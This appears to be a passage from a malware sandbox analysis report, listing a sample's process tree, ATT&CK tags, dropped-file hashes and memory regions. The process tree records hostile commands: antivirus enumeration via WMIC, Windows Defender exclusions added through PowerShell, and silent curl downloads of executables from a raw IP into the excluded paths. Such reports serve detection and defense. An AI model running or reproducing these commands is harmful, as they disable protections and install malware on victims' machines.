C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName4⤵PID:4980
-
C:\Windows\System32\Wbem\WMIC.exewmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3320 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\1293595570-1184187166-19345719-1262499522.tmp'; Add-MpPreference -ExclusionPath $filePath"4⤵PID:1664
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\1293595570-1184187166-19345719-1262499522.tmp'; Add-MpPreference -ExclusionPath $filePath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3376 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl http://104.254.246.35/files/UninstallRootkit.exe -o C:\Users\Admin\AppData\Local\Temp\1293595570-1184187166-19345719-1262499522.tmp --silent4⤵PID:1896
-
C:\Windows\system32\curl.execurl http://104.254.246.35/files/UninstallRootkit.exe -o C:\Users\Admin\AppData\Local\Temp\1293595570-1184187166-19345719-1262499522.tmp --silent5⤵PID:2128
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C powershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\$77-1326024883-1298627399-26999705-1286788431.tmp'; Add-MpPreference -ExclusionPath $filePath"4⤵PID:2400
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$filePath = 'C:\Users\Admin\AppData\Local\Temp\$77-1326024883-1298627399-26999705-1286788431.tmp'; Add-MpPreference -ExclusionPath $filePath"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1408 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl http://104.254.246.35/files/Lucky.exe -o C:\Users\Admin\AppData\Local\Temp\$77-1326024883-1298627399-26999705-1286788431.tmp --silent4⤵PID:4888
-
C:\Windows\system32\curl.execurl http://104.254.246.35/files/Lucky.exe -o C:\Users\Admin\AppData\Local\Temp\$77-1326024883-1298627399-26999705-1286788431.tmp --silent5⤵PID:5088
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3376
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4428
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5c39b3aa574c0c938c80eb263bb450311
SHA1f4d11275b63f4f906be7a55ec6ca050c62c18c88
SHA25666f8d413a30451055d4b6fa40e007197a4bb93a66a28ca4112967ec417ffab6c
SHA512eeca2e21cd4d66835beb9812e26344c8695584253af397b06f378536ca797c3906a670ed239631729c96ebb93acfb16327cf58d517e83fb8923881c5fdb6d232
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5dabfafd78687947a9de64dd5b776d25f
SHA116084c74980dbad713f9d332091985808b436dea
SHA256c7658f407cbe799282ef202e78319e489ed4e48e23f6d056b505bc0d73e34201
SHA512dae1de5245cd9b72117c430250aa2029eb8df1b85dc414ac50152d8eba4d100bcf0320ac18446f865dc96949f8b06a5b9e7a0c84f9c1b0eada318e80f99f9d2b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
864B
MD5850365b10ae1444722103e93930a1fc6
SHA1e1afb861734c621c1bbd5805cf742621c38a82f5
SHA25695ecc788f1ee6590bb0c4a0d673041c46b8f3d23c658a5c4695d684cbd6fa838
SHA51279d1e00eb85cd3a03bbe72f59ca93ab21a798267d6ea068e1e35c653c0a065ee3f6ab84874234391aaad7128f7f4adf31c49a49ab8764423f0ea21c3f0e42379
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
1KB
MD5ef3115e3872c272a1feffffa7fbca4ea
SHA1a525d74b8022f9098a3be376515fffaee6176aa2
SHA256c0e621f8daec19f8ff756fd66756b77503bcae7b33c6942ce4cba9c7bbc61bec
SHA512e4bb9ac70fd47e94edc5e07403e93da9a50d14b46b187dee4f04df9be2feae9ce34d2f206a04d1b52103309f14eef31b37da3d7995aa51f48c4910de1e9bb89b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5a1513830cf942872ad499d3d41afbe5b
SHA14b919de6c1038f60f64a7c6a5583e8fb43c838e4
SHA256d0e92e99c7765c71cbb70ddb92e0b55c140b7268c5d5ed0b80f0ebe1e4922f53
SHA51268132259212a7539a7d45b95d07baebb23290e09a736c7e8105ca0a340b813f8e92b03285ef0a074fe9a9cb379cb26e703014509f7b758f73da7cf15cb9a93f9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD56adecc0433edd6bc8973a5d3692f943b
SHA121f12ae6b797d664ff7c77fdf93f68d15438892e
SHA256be02748178cfb0ff50f9352c91518623d7777774ae3f522d222d623444dfb3f3
SHA512a83e2126c43a39c904fdb1d2ccca97237b42124063e2b85ff01b09275b6ba2bf9b871175afb9aeddae483bf8fd2fbcf08475838708c1740d265bd5ae47561e45
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD52dd00873e949fee7cff01c6acb39ca29
SHA1cb6439669c51b5d6e95360d320b1f0d0714cf54b
SHA256e9a57f59624a5d7c1c992f52469773329f8fca50d3973e77c3ab45cf29772e51
SHA5129d29d019dbb6cdbcfdcf8f6947ef550d3b1c4a940e3651a243587567f42862e4398db8a0dfd787730641e9a5e3ada0e1c1bc9f2f81e27f1a19dfc4e84b015eb7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD52739ce09e07758f34ade0598ee27ce1d
SHA1a336309adff3c15824be99bc059978dcc9cd370c
SHA25647504e43997db55ac957a99327fc617b970411f1372fc2b755464d9ad99a00bd
SHA51245b40f5b7de58f81a998d001c256a50ce15dd62d42ba332a78745bffed103ac29aa321abba60dd0147b14df73fb94f79e1b0ad66a069a0dbe77191df9246d587
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD54d9874d19334dc5eb2145ab58f25732d
SHA18c58db56b443d2935bf7ef61b4165a0df3b92a85
SHA256e5d93e3d404ec7c191ca4d3d88ed9ffcc82e60f2d8afdec1e4fbffc9d62553f7
SHA5122c09a70bac3d5691f480917b35d36734917e5cc38b5c403eef067a09bddd4da8780847b24401879aa7098ab3e2d104183ca6166c1e193c8781864fbe6ada7472
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD52979eabc783eaca50de7be23dd4eafcf
SHA1d709ce5f3a06b7958a67e20870bfd95b83cad2ea
SHA256006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903
SHA51292bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba
-
C:\Users\Admin\AppData\Local\Temp\1293595570-1184187166-19345719-1262499522.tmpFilesize
146B
MD58eec510e57f5f732fd2cce73df7b73ef
SHA13c0af39ecb3753c5fee3b53d063c7286019eac3b
SHA25655f7d9e99b8e2d4e0e193b2f0275501e6d9c1ebd29cadbea6a0da48a8587e3e0
SHA51273bbf698482132b5fd60a0b58926fddec9055f8095a53bc52714e211e9340c3419736ceafd6b279667810114d306bfccdcfcddf51c0b67fe9e3c73c54583e574
-
C:\Users\Admin\AppData\Local\Temp\1321192314-1141701036-55274516-1394016520.exeFilesize
51KB
MD5b7802d686f7c65282cd7b6a45142a98b
SHA1feb041fef423f8404d2ef046b21c506e60cac3b7
SHA256e19f99f3434059e5fc38f3dcf1c89387309af2966b90b0a24f0fa22bdc393dcd
SHA512463d1ce3edec83623df093f7b4a13e430cad4ecc3aaeff20d660d4a7c30929583aacba51d06706623e37b3051f8447ab644bcd45ee89c0fbb591fd1729dcc6ce
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5s5u34da.nhl.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
\??\pipe\LOCAL\crashpad_5064_UZPLZCCYSPGNUCNKMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/3376-138-0x00000230B7590000-0x00000230B75B2000-memory.dmpFilesize
136KB
-
memory/3900-14-0x00000236398F0000-0x00000236398F9000-memory.dmpFilesize
36KB
-
memory/3900-11-0x00000236398F0000-0x00000236398F9000-memory.dmpFilesize
36KB
-
memory/3900-12-0x0000023639910000-0x0000023639911000-memory.dmpFilesize
4KB
-
memory/4260-30-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-63-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-0-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmpFilesize
13.0MB
-
memory/4260-31-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-32-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-33-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-34-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-35-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-36-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-37-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-38-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-39-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-40-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-41-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-42-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-43-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-44-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-45-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-46-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-47-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-48-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-49-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-50-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-52-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-51-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-53-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-54-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-55-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-56-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-57-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-58-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-59-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-60-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-61-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-62-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-29-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-64-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-65-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-67-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-66-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-28-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-26-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmpFilesize
13.0MB
-
memory/4260-27-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-25-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-24-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-97-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmpFilesize
13.0MB
-
memory/4260-23-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-22-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-21-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-208-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-20-0x00007FFB38C10000-0x00007FFB38C11000-memory.dmpFilesize
4KB
-
memory/4260-9-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-7-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmpFilesize
13.0MB
-
memory/4260-5-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmpFilesize
13.0MB
-
memory/4260-238-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-6-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmpFilesize
13.0MB
-
memory/4260-253-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-252-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmpFilesize
13.0MB
-
memory/4260-3-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmpFilesize
13.0MB
-
memory/4260-2-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmpFilesize
13.0MB
-
memory/4260-4-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmpFilesize
13.0MB
-
memory/4260-1-0x00007FFB38C10000-0x00007FFB38C12000-memory.dmpFilesize
8KB
-
memory/4260-368-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-369-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-371-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-370-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmpFilesize
13.0MB
-
memory/4260-372-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-374-0x00007FFB38B70000-0x00007FFB38D65000-memory.dmpFilesize
2.0MB
-
memory/4260-373-0x00007FF66ECC0000-0x00007FF66F9BB000-memory.dmpFilesize
13.0MB